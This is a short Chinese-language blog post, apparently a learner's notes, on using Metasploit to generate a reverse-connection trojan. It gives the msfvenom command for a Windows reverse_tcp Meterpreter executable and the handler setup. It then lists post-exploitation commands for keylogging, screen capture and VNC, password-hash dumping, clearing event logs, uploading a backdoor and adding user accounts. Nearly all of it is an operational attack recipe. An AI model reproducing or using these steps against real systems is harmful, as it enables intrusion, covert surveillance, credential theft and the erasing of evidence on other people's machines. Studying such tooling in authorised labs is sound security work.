AI智能
改变未来

Metasploit 生成反弹连接木马

“注 本文为笔者学习过程中记录”

Step1 :msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.128 LPORT=12345 -i 5 -f exe -o /test.exe
生成一个名为 test.exe 的木马文件到msf目录下

Step2: 通过 msfconsole 命令进入metasploit :
Step3: Use exploit/multi/handler 进入到监听模式。
Step4:设置payload反弹 Set payload windows/meterpreter/reverse_tcp
step5: 设置LHOST、LPORT参数
set LHOST 192.168.1.143(要监听的本地IP)
set LPORT 12345(要监听本地端口)
Step6:exploit攻击开始(开始监听设置的本地端口)

当靶机运行test文件后,即可在kali 端获取连接。

meterpreter一些常用命令:
getwd 当前目录
dir 查看所有文件
cat c:\\123.txt 查看文件123.txt内容(数据是字符串传递,所以加一个转义字符\\)
search -f cmd.exe (搜索名为cmd.exe文件所在目录)
upload /root/桌面/backldoor.exe(要上传的文件) -> c:\\(上传到的目录) 上传文件
download c:\\123txt /root 下载文件
clearev 清除日志
getuid 当前用户
ps 查看所用进程
kill 杀死某个进程
sysinfo 系统信息

键盘记录
keyscan_start 开始键盘记录
keyscan_dump 查看结果
keyscan_stop

屏幕截图
screenshot

屏幕监控
run vnc

获取密文密码
hashdump

shell
获取shell,进入cmd
cmd下(测试机是windows):

dir:显示所有文件
cd:切换目录
whoami 查看当前用户级别
net user 查看用户列表
net user 用户名 密码 /add 添加用户
net user 用户名 密码 更改用户密码

赞(0) 打赏
未经允许不得转载:爱站程序员基地 » Metasploit 生成反弹连接木马